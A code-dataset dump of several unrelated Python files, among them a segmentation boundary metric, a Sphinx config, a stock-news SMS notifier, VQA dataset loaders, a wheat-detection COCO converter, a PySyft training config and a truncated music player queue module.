Fc = np.zeros(self.n_classes)
for class_id in range(self.n_classes):
args = []
for i in range(batch_size):
if seg_map[i].shape[0] == self.n_classes:
pred_i = seg_map[i][class_id] > 0.5
pred_is_boundary = True
else:
pred_i = seg_map[i] == class_id
pred_is_boundary = False
args.append([
(pred_i).astype(np.uint8),
(gt_map[i] == class_id).astype(np.uint8),
(gt_map[i] == -1),
self.boundary_threshold,
class_id,
pred_is_boundary
])
results = self.pool.map(db_eval_boundary, args)
results = np.array(results)
Fs = results[:, 0]
_valid = ~np.isnan(Fs)
Fc[class_id] = np.sum(_valid)
Fs[np.isnan(Fs)] = 0
Fpc[class_id] = sum(Fs)
self._Fc = self._Fc + Fc
self._Fpc = self._Fpc + Fpc
def get_scores(self):
if self.seg_map_cache is None:
return 0, 0
self._update_scores(self.seg_map_cache, self.gt_map_cache)
F_score = np.sum(self._Fpc / self._Fc) / self.n_classes
F_score_classwise = self._Fpc / self._Fc
return F_score, F_score_classwise
def reset(self):
self._Fpc = self._Fc = 0
def db_eval_boundary(args):
"""
Compute mean,recall and decay from per-frame evaluation.
Calculates precision/recall for boundaries between foreground_mask and
gt_mask using morphological operators to speed it up.
Arguments:
foreground_mask (ndarray): binary segmentation image.
gt_mask (ndarray): binary annotated image.
Returns:
F (float): boundaries F-measure
P (float): boundaries precision
R (float): boundaries recall
"""
foreground_mask, gt_mask, ignore_mask, bound_th, class_id, pred_is_boundary = args
assert np.atleast_3d(foreground_mask).shape[2] == 1
bound_pix = bound_th if bound_th >= 1 else \
np.ceil(bound_th*np.linalg.norm(foreground_mask.shape))
# print(bound_pix)
# print(gt.shape)
# print(np.unique(gt))
foreground_mask[ignore_mask] = 0
gt_mask[ignore_mask] = 0
# Get the pixel boundaries of both masks
if pred_is_boundary:
fg_boundary = foreground_mask
else:
fg_boundary = seg2bmap(foreground_mask)
gt_boundary = seg2bmap(gt_mask)
from skimage.morphology import disk
from cv2 import dilate
def binary_dilation(x, d): return dilate(
x.astype(np.uint8), d).astype(np.bool)
fg_dil = binary_dilation(fg_boundary, disk(bound_pix))
gt_dil = binary_dilation(gt_boundary, disk(bound_pix))
# Get the intersection
gt_match = gt_boundary * fg_dil
fg_match = fg_boundary * gt_dil
# Area of the intersection
n_fg = np.sum(fg_boundary)
n_gt = np.sum(gt_boundary)
# % Compute precision and recall
if n_fg == 0 and n_gt > 0:
precision = 1
recall = 0
elif n_fg > 0 and n_gt == 0:
precision = 0
recall = 1
elif n_fg == 0 and n_gt == 0:
precision = 1
recall = 1
else:
precision = np.sum(fg_match) / float(n_fg)
recall = np.sum(gt_match) / float(n_gt)
# Compute F measure
if precision + recall == 0:
F = 0
else:
F = 2 * precision * recall / (precision + recall)
return F, precision
def seg2bmap(seg, width=None, height=None):
"""
From a segmentation, compute a binary boundary map with 1 pixel wide
boundaries. The boundary pixels are offset by 1/2 pixel towards the
origin from the actual segment boundary.
Arguments:
seg : Segments labeled from 1..k.
width : Width of desired bmap <= seg.shape[1]
height : Height of desired bmap <= seg.shape[0]
Returns:
bmap (ndarray): Binary boundary map.
<NAME> <<EMAIL>>
January 2003
"""
seg = seg.astype(np.bool)
seg[seg > 0] = 1
assert np.atleast_3d(seg).shape[2] == 1
width = seg.shape[1] if width is None else width
height = seg.shape[0] if height is None else height
h, w = seg.shape[:2]
ar1 = float(width) / float(height)
ar2 = float(w) / float(h)
assert not (width > w | height > h | abs(ar1 - ar2) > 0.01),\
'Can''t convert %dx%d seg to %dx%d bmap.' % (w, h, width, height)
e = np.zeros_like(seg)
s = np.zeros_like(seg)
se = np.zeros_like(seg)
e[:, :-1] = seg[:, 1:]
s[:-1, :] = seg[1:, :]
se[:-1, :-1] = seg[1:, 1:]
b = seg ^ e | seg ^ s | seg ^ se
b[-1, :] = seg[-1, :] ^ e[-1, :]
b[:, -1] = seg[:, -1] ^ s[:, -1]
b[-1, -1] = 0
if w == width and h == height:
bmap = b
else:
bmap = np.zeros((height, width))
for x in range(w):
for y in range(h):
if b[y, x]:
j = 1 + floor((y - 1) + height / h)
i = 1 + floor((x - 1) + width / h)
bmap[j, i] = 1
return bmap | 1.960938 | 2 |
docs/conf.py | mitre/thumbtack-client | 3 | 12760336 | <reponame>mitre/thumbtack-client
# -*- coding: utf-8 -*-
project = "thumbtack-client"
copyright = "2019, The MITRE Corporation"
author = "The MITRE Corporation"
version = "0.3.0"
release = "0.3.0"
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.napoleon",
"sphinx.ext.viewcode",
]
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
language = None
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
pygments_style = "sphinx"
html_theme = "sphinx_rtd_theme"
html_theme_options = {
# 'canonical_url': '',
# 'analytics_id': '',
# 'logo_only': False,
"display_version": True,
"prev_next_buttons_location": "bottom",
# 'style_external_links': False,
# 'vcs_pageview_mode': '',
# Toc options
"collapse_navigation": False,
"sticky_navigation": True,
"navigation_depth": 2,
# 'includehidden': True,
# 'titles_only': False
}
htmlhelp_basename = "thumbtack-clientdoc"
latex_elements = {}
latex_documents = [
(
master_doc,
"thumbtack-client.tex",
"thumbtack-client Documentation",
"The MITRE Corporation",
"manual",
),
]
man_pages = [
(master_doc, "thumbtack-client", "thumbtack-client Documentation", [author], 1)
]
texinfo_documents = [
(
master_doc,
"thumbtack-client",
"thumbtack-client Documentation",
author,
"thumbtack-client",
"One line description of project.",
"Miscellaneous",
),
]
| 1.28125 | 1 |
main.py | AfkZa4aem/stock_market_notificator | 0 | 12760337 | import requests
from twilio.rest import Client
STOCK_NAME = "TSLA"
COMPANY_NAME = "Tesla"
account_sid = "Your Twilio acc_sid"
auth_token = "Your Twilio acc token"
STOCK_ENDPOINT = "https://www.alphavantage.co/query"
NEWS_ENDPOINT = "https://newsapi.org/v2/everything"
STOCK_API = "your_av_api_token"
NEWS_API = "your_news_api_token"
stocks_params = {
"function": "TIME_SERIES_DAILY",
"symbol": STOCK_NAME,
"apikey": STOCK_API,
}
stocks_response = requests.get(url=STOCK_ENDPOINT, params=stocks_params)
stocks_response.raise_for_status()
stocks_response_data = stocks_response.json()["Time Series (Daily)"]
stocks_data = [value for (key, value) in stocks_response_data.items()]
y_price = float(stocks_data[0]["4. close"])
dby_price = float(stocks_data[1]["4. close"])
positive_diff = y_price - dby_price
up_or_down = None
if positive_diff > 0:
up_or_down = "🔼"
else:
up_or_down = "🔽"
percentage = float("%.2f" % (100 * (positive_diff / y_price)))
print(percentage)
if abs(percentage) > 1:
news_param = {
"qInTitle": COMPANY_NAME,
"language": "en",
"apiKey": NEWS_API
}
news_response = requests.get(url=NEWS_ENDPOINT, params=news_param)
news_response.raise_for_status()
news_data = news_response.json()["articles"]
three_news = news_data[:3]
msg_list = [f"{COMPANY_NAME}: {up_or_down}{positive_diff}%\nHeadline:{article['title']}. \nBrief: {article['description']}" for article in three_news]
print(msg_list)
client = Client(account_sid, auth_token)
for msg in msg_list:
message = client.messages \
.create(
body=msg,
from_='your_twilio_number',
to="your_mobile_number"
)
| 3.078125 | 3 |
src/datasets/dataset_vqa.py | Steve-Tod/ClipBERT | 0 | 12760338 | <filename>src/datasets/dataset_vqa.py
import torch
import numpy as np
from torch.utils.data.dataloader import default_collate
from src.utils.basic_utils import flat_list_of_lists
from src.datasets.dataset_base import ClipBertBaseDataset, img_collate
class ClipBertVQATagDataset(ClipBertBaseDataset):
""" This should work for both train and test (where labels are not available).
datalist: list(tuples) each tuple is (img_id, list(dicts)),
each dict {
"type": "image",
"filepath": "/abs/path/to/COCO_val2014_000000401092.jpg",
"text": "A plate of food and a beverage are on a table.",
"labels": {"down": 1, "at table": 0.3, "skateboard": 0.3, "table": 0.3}
"answer_type": "other"
"question_id": 262148000
}
tokenizer:
max_img_size: int,
max_txt_len: int, max text sequence length, including special tokens.
itm_neg_prob: float [0, 1] set to 0 will disable itm.
"""
def __init__(self, datalist, tokenizer, img_lmdb_dir, fps=3,
max_img_size=1000, max_txt_len=20, ans2label=None):
super(ClipBertVQATagDataset, self).__init__(
datalist, tokenizer, img_lmdb_dir, fps=fps,
max_img_size=max_img_size, max_txt_len=max_txt_len,
) # init its parent class
self.ans2label = ans2label
self.num_labels = len(ans2label)
self.label2ans = {v: k for k, v in ans2label.items()}
self.qid2data = {d["question_id"]: d for group in datalist for d in group[1]}
def __len__(self):
return len(self.datalist)
def __getitem__(self, index):
img_id, examples = self.datalist[index] # one image with multiple examples
img_array = self._load_img(img_id) # tensor
examples = [self._get_single_example(e) for e in examples]
return dict(
img=img_array,
examples=examples,
n_examples=len(examples) # used to create image feature copies.
)
def _get_single_example(self, data):
return dict(
text_str=data["txt"],
question_id=data["question_id"],
object_tags = data["object_tags"],
labels=self._get_vqa_targets(
data["labels"]) if "labels" in data else None
)
def _get_vqa_targets(self, ans2score_dict):
"""
Args:
ans2score_dict: {"table": 0.9, "picnic table": 1,
"skateboard": 0.3}
Returns:
A 1D tensor
"""
targets = torch.zeros(self.num_labels)
raw_answers = list(ans2score_dict.keys())
scores = [ans2score_dict[k] for k in raw_answers]
labels = [self.ans2label[ans] for ans in raw_answers]
targets.scatter_(
0, torch.tensor(labels).long(),
torch.tensor(scores).float())
return targets
def evaluate_vqa(self, results):
"""
Args:
results: list(dict), in accordance with VQA online submission format
each dict is
{
"question_id": int,
"answer": str
}
Returns:
VQA score
"""
scores = []
answer_types = []
answer_type2idx = {"yes/no": 0, "number": 1, "other": 2}
for d in results:
qid = d["question_id"]
ans = d["answer"]
raw_data = self.qid2data[qid]
labels = raw_data["labels"]
if ans in labels:
scores.append(labels[ans])
else:
scores.append(0.)
answer_types.append(answer_type2idx[raw_data["answer_type"]])
metrics = dict()
scores = np.array(scores)
metrics["overall_acc"] = float(np.mean(scores))
answer_types = np.array(answer_types)
ratios = dict()
for ans_type, ans_type_idx in answer_type2idx.items():
answer_type_mask = answer_types == ans_type_idx
answer_type_scores = scores[answer_type_mask]
metrics[f"{ans_type}_acc"] = float(np.mean(answer_type_scores))
ratios[f"{ans_type}_ratio"] = [
1. * len(answer_type_scores) / len(scores),
len(answer_type_scores)]
metrics["ratios"] = ratios
return metrics
class VQATagCollator(object):
def __init__(self, tokenizer, max_length=120):
self.tokenizer = tokenizer
self.max_length = max_length
def collate_batch(self, batch):
if isinstance(batch[0]["img"], torch.Tensor):
v_collate = default_collate
else:
v_collate = img_collate
visual_inputs = v_collate([d["img"] for d in batch]) # (B, #frm=1 or T, 3, H, W)
# group data
text_examples = flat_list_of_lists([d["examples"] for d in batch])
n_examples_list = [d["n_examples"] for d in batch] # (B, )
# group elements data
batch_enc = self.tokenizer.batch_encode_plus(
[d["text_str"] + " [SEP] " + d["object_tags"] for d in text_examples],
max_length=self.max_length,
pad_to_max_length=True,
return_tensors="pt"
)
text_input_ids = batch_enc.input_ids # (B, L)
text_input_mask = batch_enc.attention_mask # (B, L)
labels = default_collate(
[d["labels"] for d in text_examples]) \
if text_examples[0]["labels"] is not None else None # (B, #ans)
question_ids = [d["question_id"] for d in text_examples]
return dict(
visual_inputs=visual_inputs, # (B, #frm=1 or T, H, W, C)
text_input_ids=text_input_ids,
text_input_mask=text_input_mask,
question_ids=question_ids,
labels=labels,
n_examples_list=n_examples_list # used to create image feature copies.
)
class ClipBertVQADataset(ClipBertBaseDataset):
""" This should work for both train and test (where labels are not available).
datalist: list(tuples) each tuple is (img_id, list(dicts)),
each dict {
"type": "image",
"filepath": "/abs/path/to/COCO_val2014_000000401092.jpg",
"text": "A plate of food and a beverage are on a table.",
"labels": {"down": 1, "at table": 0.3, "skateboard": 0.3, "table": 0.3}
"answer_type": "other"
"question_id": 262148000
}
tokenizer:
max_img_size: int,
max_txt_len: int, max text sequence length, including special tokens.
itm_neg_prob: float [0, 1] set to 0 will disable itm.
"""
def __init__(self, datalist, tokenizer, img_lmdb_dir, fps=3,
max_img_size=1000, max_txt_len=20, ans2label=None):
super(ClipBertVQADataset, self).__init__(
datalist, tokenizer, img_lmdb_dir, fps=fps,
max_img_size=max_img_size, max_txt_len=max_txt_len,
) # init its parent class
self.ans2label = ans2label
self.num_labels = len(ans2label)
self.label2ans = {v: k for k, v in ans2label.items()}
self.qid2data = {d["question_id"]: d for group in datalist for d in group[1]}
def __len__(self):
return len(self.datalist)
def __getitem__(self, index):
img_id, examples = self.datalist[index] # one image with multiple examples
img_array = self._load_img(img_id) # tensor
examples = [self._get_single_example(e) for e in examples]
return dict(
img=img_array,
examples=examples,
n_examples=len(examples) # used to create image feature copies.
)
def _get_single_example(self, data):
return dict(
text_str=data["txt"],
question_id=data["question_id"],
labels=self._get_vqa_targets(
data["labels"]) if "labels" in data else None
)
def _get_vqa_targets(self, ans2score_dict):
"""
Args:
ans2score_dict: {"table": 0.9, "picnic table": 1,
"skateboard": 0.3}
Returns:
A 1D tensor
"""
targets = torch.zeros(self.num_labels)
raw_answers = list(ans2score_dict.keys())
scores = [ans2score_dict[k] for k in raw_answers]
labels = [self.ans2label[ans] for ans in raw_answers]
targets.scatter_(
0, torch.tensor(labels).long(),
torch.tensor(scores).float())
return targets
def evaluate_vqa(self, results):
"""
Args:
results: list(dict), in accordance with VQA online submission format
each dict is
{
"question_id": int,
"answer": str
}
Returns:
VQA score
"""
scores = []
answer_types = []
answer_type2idx = {"yes/no": 0, "number": 1, "other": 2}
for d in results:
qid = d["question_id"]
ans = d["answer"]
raw_data = self.qid2data[qid]
labels = raw_data["labels"]
if ans in labels:
scores.append(labels[ans])
else:
scores.append(0.)
answer_types.append(answer_type2idx[raw_data["answer_type"]])
metrics = dict()
scores = np.array(scores)
metrics["overall_acc"] = float(np.mean(scores))
answer_types = np.array(answer_types)
ratios = dict()
for ans_type, ans_type_idx in answer_type2idx.items():
answer_type_mask = answer_types == ans_type_idx
answer_type_scores = scores[answer_type_mask]
metrics[f"{ans_type}_acc"] = float(np.mean(answer_type_scores))
ratios[f"{ans_type}_ratio"] = [
1. * len(answer_type_scores) / len(scores),
len(answer_type_scores)]
metrics["ratios"] = ratios
return metrics
class VQACollator(object):
def __init__(self, tokenizer, max_length=20):
self.tokenizer = tokenizer
self.max_length = max_length
def collate_batch(self, batch):
if isinstance(batch[0]["img"], torch.Tensor):
v_collate = default_collate
else:
v_collate = img_collate
visual_inputs = v_collate([d["img"] for d in batch]) # (B, #frm=1 or T, 3, H, W)
# group data
text_examples = flat_list_of_lists([d["examples"] for d in batch])
n_examples_list = [d["n_examples"] for d in batch] # (B, )
# group elements data
batch_enc = self.tokenizer.batch_encode_plus(
[d["text_str"] for d in text_examples],
max_length=self.max_length,
pad_to_max_length=True,
return_tensors="pt"
)
text_input_ids = batch_enc.input_ids # (B, L)
text_input_mask = batch_enc.attention_mask # (B, L)
labels = default_collate(
[d["labels"] for d in text_examples]) \
if text_examples[0]["labels"] is not None else None # (B, #ans)
question_ids = [d["question_id"] for d in text_examples]
return dict(
visual_inputs=visual_inputs, # (B, #frm=1 or T, H, W, C)
text_input_ids=text_input_ids,
text_input_mask=text_input_mask,
question_ids=question_ids,
labels=labels,
n_examples_list=n_examples_list # used to create image feature copies.
)
| 2.484375 | 2 |
mi/dataset/parser/nutnr_n_auv.py | emilyhahn/mi-dataset | 1 | 12760339 | <reponame>emilyhahn/mi-dataset
"""
@package mi.dataset.parser
@file marine-integrations/mi/dataset/parser/nutnr_n_auv.py
@author <NAME>
@brief Parser and particle Classes and tools for the nutnr_n_auv data
Release notes:
initial release
"""
__author__ = '<NAME>'
__license__ = 'Apache 2.0'
from mi.core.log import get_logger
log = get_logger()
from mi.dataset.parser.auv_common import \
AuvCommonParticle, \
AuvCommonParser, \
compute_timestamp
def encode_bool(bool_string):
# interpret a string as boolean, convert to 0 or 1
bool_string = bool_string.lower()
if bool_string == 'true':
return 1
elif bool_string == 'false':
return 0
else:
raise TypeError
# The structure below is a list of tuples
# Each tuple consists of
# parameter name, index into raw data parts list, encoding function
NUTNR_N_AUV_PARAM_MAP = [
# message ID is typically index 0
('mission_epoch', 1, int),
('auv_latitude', 2, float),
('auv_longitude', 3, float),
('mission_time', 4, int),
('m_depth', 5, float),
('sample_time', 6, float),
('nitrate_concentration', 7, float),
('nutnr_nitrogen_in_nitrate', 8, float),
('nutnr_spectral_avg_last_dark', 9, int),
('temp_spectrometer', 10, float),
('lamp_state', 11, encode_bool),
('temp_lamp', 12, float),
('lamp_time_cumulative', 13, int),
('humidity', 14, float),
('voltage_main', 15, float),
('voltage_lamp', 16, float),
('nutnr_voltage_int', 17, float),
('nutnr_current_main', 18, float)
]
class NutnrNAuvInstrumentParticle(AuvCommonParticle):
_auv_param_map = NUTNR_N_AUV_PARAM_MAP
# must provide a parameter map for _build_parsed_values
# set the data_particle_type for the DataParticle class
_data_particle_type = "nutnr_n_auv_instrument"
NUTNR_N_AUV_ID = '1174' # message ID of nutnr_n records
NUTNR_N_AUV_FIELD_COUNT = 19 # number of expected fields in an dost_ln record
NUTNR_N_AUV_MESSAGE_MAP = [(NUTNR_N_AUV_ID,
NUTNR_N_AUV_FIELD_COUNT,
compute_timestamp,
NutnrNAuvInstrumentParticle)]
class NutnrNAuvParser(AuvCommonParser):
def __init__(self,
stream_handle,
exception_callback):
# provide message ID and # of fields to parent class
super(NutnrNAuvParser, self).__init__(stream_handle,
exception_callback,
NUTNR_N_AUV_MESSAGE_MAP)
| 2.25 | 2 |
Day 01/part_2.py | brodzik/advent-of-code-2019 | 0 | 12760340 | def main():
result = 0
with open("input.txt") as input_file:
for x in input_file:
x = int(x)
while True:
x = x // 3 - 2
if x < 0:
break
result += x
print(result)
if __name__ == "__main__":
main()
| 3.859375 | 4 |
wheat_detection/utils/CvtCOCO.py | fengyouliang/wheat_detection | 0 | 12760341 | <filename>wheat_detection/utils/CvtCOCO.py
# -*- coding: utf-8 -*-
import json
import os
import os.path as osp
from wheat_detection.utils.scripts import cvt_csv
import cv2
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from tqdm import tqdm
np.random.seed(41)
class config:
data_root = '/home/fengyouliang/datasets/WHD'
class WHD2COCO:
def __init__(self, kaggle_csv_name, random_seed=None, data_root=config.data_root, min_area_limit=400,
max_area_limit=100000,
class_agnostic=True, stratified=True, test_size=0.2):
self.data_root = data_root
self.kaggle_csv_file = f'{data_root}/kaggle_csv/{kaggle_csv_name}.csv'
assert osp.isfile(self.kaggle_csv_file) == True, f'{self.kaggle_csv_file} is not found ! \nCheck!'
self.class_agnostic = class_agnostic
self.min_area_limit = min_area_limit
self.max_area_limit = max_area_limit
self.random_seed = random_seed
self.stratified = stratified
self.test_size = test_size
if self.class_agnostic:
self.classname_to_id = {'wheat': 0}
else:
self.classname_to_id = {
'usask_1': 0,
'arvalis_1': 1,
'inrae_1': 2,
'ethz_1': 3,
'arvalis_3': 4,
'rres_1': 5,
'arvalis_2': 6,
}
def split_train_val(self):
data_root_path = self.data_root
original_train = pd.read_csv(self.kaggle_csv_file)
image_ids = original_train['image_id'].unique()
if self.stratified:
image_source = original_train[['image_id', 'source']].drop_duplicates()
# get lists for image_ids and sources
image_ids = image_source['image_id'].to_numpy()
sources = image_source['source'].to_numpy()
ret = train_test_split(image_ids, sources, test_size=self.test_size, stratify=sources)
train, val, y_train, y_val = ret
else:
train, val = train_test_split(image_ids, test_size=self.test_size, random_state=self.random_seed)
train_csv = original_train.loc[original_train['image_id'].isin(train)]
val_csv = original_train.loc[original_train['image_id'].isin(val)]
train_csv.to_csv(f'{data_root_path}/split_csv/train.csv')
val_csv.to_csv(f'{data_root_path}/split_csv/val.csv')
def to_coco(self, mode):
instance = {'info': 'wheat detection', 'license': ['fengyun']}
images, annotations = self.load_csv_ann(mode)
print(f'#images: {len(images)} \t #annontations: {len(annotations)}')
instance['images'] = images
instance['annotations'] = annotations
instance['categories'] = self._get_categories()
return instance
def save_coco_json(self, ann_fold_name):
self.split_train_val()
save_path = f'{self.data_root}/{ann_fold_name}'
if not osp.exists(save_path):
os.makedirs(save_path)
else:
assert len(os.listdir(save_path)) == 0, f'{save_path} is not None! \nPlease check'
for mode in ['train', 'val']:
save_file = f'{save_path}/{mode}.json'
instance = self.to_coco(mode)
json.dump(instance, open(save_file, 'w'), ensure_ascii=False, indent=2)
print(f'dump done! ({save_file})')
def load_csv_ann(self, mode):
ann_file = f'{self.data_root}/split_csv/{mode}.csv'
ann_dataframe = pd.read_csv(ann_file)
ann_dataframe = cvt_csv(ann_dataframe)
image_ids = ann_dataframe['image_id'].unique()
images = []
annotations = []
box_id = 1
bar = tqdm(enumerate(image_ids), total=len(image_ids))
for idx, image_id in bar:
bar.set_description(f'{image_id}')
image_idx = idx + 1
image_set = ann_dataframe[ann_dataframe['image_id'] == image_id]
image = dict()
image['height'] = 1024
image['width'] = 1024
image['id'] = image_idx
image['file_name'] = image_id + '.jpg'
images.append(image)
bboxes = image_set[['bbox_xmin', 'bbox_ymin', 'bbox_width', 'bbox_height']].values
labels = image_set[['source']].values
areas = image_set[['bbox_area']].values
for bb_idx, (bbox, label, area) in enumerate(zip(bboxes, labels, areas)):
box_item = dict()
box_item['bbox'] = list(bbox)
x, y, w, h = box_item['bbox']
if self.bbox_filter(w, h):
continue
box_item['segmentation'] = [[x, y, x, y + h, x + w, y + h, x + w, y]]
box_item['id'] = box_id
box_id += 1
box_item['image_id'] = image_idx
if self.class_agnostic:
box_item['category_id'] = self.classname_to_id['wheat'] # == 0
else:
box_item['category_id'] = self.classname_to_id[label[0]]
box_item['area'] = area[0]
box_item['iscrowd'] = 0
annotations.append(box_item)
return images, annotations
def _image(self, path):
image = {}
print(path)
img = cv2.imread(self.image_dir + path)
image['height'] = img.shape[0]
image['width'] = img.shape[1]
image['id'] = self.img_id
image['file_name'] = path
return image
def _get_categories(self):
categories = []
for k, v in self.classname_to_id.items():
category = {'id': v, 'name': k}
categories.append(category)
return categories
def bbox_filter(self, w, h):
if not self.min_area_limit < w * h < self.max_area_limit:
return True
# if w < 10 or h < 10:
# return True
# if w > 512 or h > 512:
# return True
return False
def split_fold(num_fold=5):
base_name = f'cross_validation'
for i in range(num_fold):
fold_name = f'{base_name}/fold_{i}'
WHD2COCO('train_0618', random_seed=i, class_agnostic=True).save_coco_json(ann_fold_name=fold_name)
def gen_coco_dataset():
fold_name = 'ann_with_mask'
WHD2COCO('train_0618', random_seed=None, class_agnostic=True, test_size=0.1).save_coco_json(ann_fold_name=fold_name)
if __name__ == '__main__':
gen_coco_dataset()
| 2.28125 | 2 |
syft/federated/train_config.py | flo257/PySyft | 2 | 12760342 | <filename>syft/federated/train_config.py<gh_stars>1-10
from typing import Union
import weakref
import torch
import syft as sy
from syft.generic.pointers.object_wrapper import ObjectWrapper
from syft.workers.abstract import AbstractWorker
from syft.workers.base import BaseWorker
class TrainConfig:
"""TrainConfig abstraction.
A wrapper object that contains all that is needed to run a training loop
remotely on a federated learning setup.
"""
def __init__(
self,
model: torch.jit.ScriptModule,
loss_fn: torch.jit.ScriptModule,
owner: AbstractWorker = None,
batch_size: int = 32,
epochs: int = 1,
optimizer: str = "SGD",
optimizer_args: dict = {"lr": 0.1},
id: Union[int, str] = None,
max_nr_batches: int = -1,
shuffle: bool = True,
loss_fn_id: int = None,
model_id: int = None,
):
"""Initializer for TrainConfig.
Args:
model: A traced torch nn.Module instance.
loss_fn: A jit function representing a loss function which
shall be used to calculate the loss.
batch_size: Batch size used for training.
epochs: Epochs used for training.
optimizer: A string indicating which optimizer should be used.
optimizer_args: A dict containing the arguments to initialize the optimizer. Defaults to {'lr': 0.1}.
owner: An optional BaseWorker object to specify the worker on which
the tensor is located.
id: An optional string or integer id of the tensor.
max_nr_batches: Maximum number of training steps that will be performed. For large datasets
this can be used to run for less than the number of epochs provided.
shuffle: boolean, whether to access the dataset randomly (shuffle) or sequentially (no shuffle).
loss_fn_id: The id_at_location of (the ObjectWrapper of) a loss function which
shall be used to calculate the loss. This is used internally for train config deserialization.
model_id: id_at_location of a traced torch nn.Module instance (objectwrapper). . This is used internally for train config deserialization.
"""
# syft related attributes
self.owner = owner if owner else sy.hook.local_worker
self.id = id if id is not None else sy.ID_PROVIDER.pop()
self.location = None
# training related attributes
self.model = model
self.loss_fn = loss_fn
self.batch_size = batch_size
self.epochs = epochs
self.optimizer = optimizer
self.optimizer_args = optimizer_args
self.max_nr_batches = max_nr_batches
self.shuffle = shuffle
# pointers
self.model_ptr = None
self.loss_fn_ptr = None
# internal ids
self._model_id = model_id
self._loss_fn_id = loss_fn_id
def __str__(self) -> str:
"""Returns the string representation of a TrainConfig."""
out = "<"
out += str(type(self)).split("'")[1].split(".")[-1]
out += " id:" + str(self.id)
out += " owner:" + str(self.owner.id)
if self.location:
out += " location:" + str(self.location.id)
out += " epochs: " + str(self.epochs)
out += " batch_size: " + str(self.batch_size)
out += " optimizer_args: " + str(self.optimizer_args)
out += ">"
return out
def _wrap_and_send_obj(self, obj, location):
"""Wrappers object and send it to location."""
obj_with_id = ObjectWrapper(id=sy.ID_PROVIDER.pop(), obj=obj)
obj_ptr = self.owner.send(obj_with_id, location)
obj_id = obj_ptr.id_at_location
return obj_ptr, obj_id
def send(self, location: BaseWorker) -> weakref:
"""Gets the pointer to a new remote object.
One of the most commonly used methods in PySyft, this method serializes
the object upon which it is called (self), sends the object to a remote
worker, creates a pointer to that worker, and then returns that pointer
from this function.
Args:
location: The BaseWorker object which you want to send this object
to. Note that this is never actually the BaseWorker but instead
a class which instantiates the BaseWorker abstraction.
Returns:
A weakref instance.
"""
# Send traced model
self.model_ptr, self._model_id = self._wrap_and_send_obj(self.model, location)
# Send loss function
self.loss_fn_ptr, self._loss_fn_id = self._wrap_and_send_obj(self.loss_fn, location)
# Send train configuration itself
ptr = self.owner.send(self, location)
return ptr
def get(self, location):
return self.owner.request_obj(self, location)
def get_model(self):
if self.model is not None:
return self.model_ptr.get()
def get_loss_fn(self):
if self.loss_fn is not None:
return self.loss_fn.get()
@staticmethod
def simplify(train_config: "TrainConfig") -> tuple:
"""Takes the attributes of a TrainConfig and saves them in a tuple.
Attention: this function does not serialize the model and loss_fn attributes
of a TrainConfig instance, these are serialized and sent before. TrainConfig
keeps a reference to the sent objects using _model_id and _loss_fn_id which
are serialized here.
Args:
train_config: a TrainConfig object
Returns:
tuple: a tuple holding the unique attributes of the TrainConfig object
"""
return (
train_config._model_id,
train_config._loss_fn_id,
train_config.batch_size,
train_config.epochs,
sy.serde._simplify(train_config.optimizer),
sy.serde._simplify(train_config.optimizer_args),
sy.serde._simplify(train_config.id),
train_config.max_nr_batches,
train_config.shuffle,
)
@staticmethod
def detail(worker: AbstractWorker, train_config_tuple: tuple) -> "TrainConfig":
"""This function reconstructs a TrainConfig object given it's attributes in the form of a tuple.
Args:
worker: the worker doing the deserialization
train_config_tuple: a tuple holding the attributes of the TrainConfig
Returns:
train_config: A TrainConfig object
"""
model_id, loss_fn_id, batch_size, epochs, optimizer, optimizer_args, id, max_nr_batches, shuffle = (
train_config_tuple
)
id = sy.serde._detail(worker, id)
detailed_optimizer = sy.serde._detail(worker, optimizer)
detailed_optimizer_args = sy.serde._detail(worker, optimizer_args)
train_config = TrainConfig(
model=None,
loss_fn=None,
owner=worker,
id=id,
model_id=model_id,
loss_fn_id=loss_fn_id,
batch_size=batch_size,
epochs=epochs,
optimizer=detailed_optimizer,
optimizer_args=detailed_optimizer_args,
max_nr_batches=max_nr_batches,
shuffle=shuffle,
)
return train_config
| 2.234375 | 2 |
music_assistant/models/player_queue.py | music-assistant/music-assistant | 0 | 12760343 | <gh_stars>0
"""Model and helpders for a PlayerQueue."""
from __future__ import annotations
import asyncio
import random
from asyncio import Task, TimerHandle
from dataclasses import dataclass
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from uuid import uuid4
from mashumaro import DataClassDictMixin
from music_assistant.helpers.audio import get_stream_details
from music_assistant.models.enums import (
ContentType,
CrossFadeMode,
EventType,
MediaType,
QueueOption,
RepeatMode,
)
from music_assistant.models.errors import MediaNotFoundError, QueueEmpty
from music_assistant.models.event import MassEvent
from music_assistant.models.media_items import Radio, StreamDetails, Track
from .player import Player, PlayerGroup, PlayerState
if TYPE_CHECKING:
from music_assistant.mass import MusicAssistant
@dataclass
class QueueItem(DataClassDictMixin):
"""Representation of a queue item."""
uri: str
name: str = ""
duration: Optional[int] = None
item_id: str = ""
sort_index: int = 0
streamdetails: Optional[StreamDetails] = None
media_type: MediaType = MediaType.UNKNOWN
image: Optional[str] = None
available: bool = True
media_item: Union[Track, Radio, None] = None
def __post_init__(self):
"""Set default values."""
if not self.item_id:
self.item_id = str(uuid4())
if not self.name:
self.name = self.uri
@classmethod
def __pre_deserialize__(cls, d: Dict[Any, Any]) -> Dict[Any, Any]:
"""Run actions before deserialization."""
d.pop("streamdetails", None)
return d
def __post_serialize__(self, d: Dict[Any, Any]) -> Dict[Any, Any]:
"""Run actions before serialization."""
if self.media_type == MediaType.RADIO:
d.pop("duration")
return d
@classmethod
def from_media_item(cls, media_item: Track | Radio):
"""Construct QueueItem from track/radio item."""
if isinstance(media_item, Track):
artists = "/".join((x.name for x in media_item.artists))
name = f"{artists} - {media_item.name}"
else:
name = media_item.name
return cls(
uri=media_item.uri,
name=name,
duration=media_item.duration,
media_type=media_item.media_type,
media_item=media_item,
image=media_item.image,
available=media_item.available,
)
class QueueSettings:
"""Representation of (user adjustable) PlayerQueue settings/preferences."""
def __init__(self, queue: PlayerQueue) -> None:
"""Initialize."""
self._queue = queue
self.mass = queue.mass
self._repeat_mode: RepeatMode = RepeatMode.OFF
self._shuffle_enabled: bool = False
self._crossfade_mode: CrossFadeMode = CrossFadeMode.DISABLED
self._crossfade_duration: int = 6
self._volume_normalization_enabled: bool = True
self._volume_normalization_target: int = -23
@property
def repeat_mode(self) -> RepeatMode:
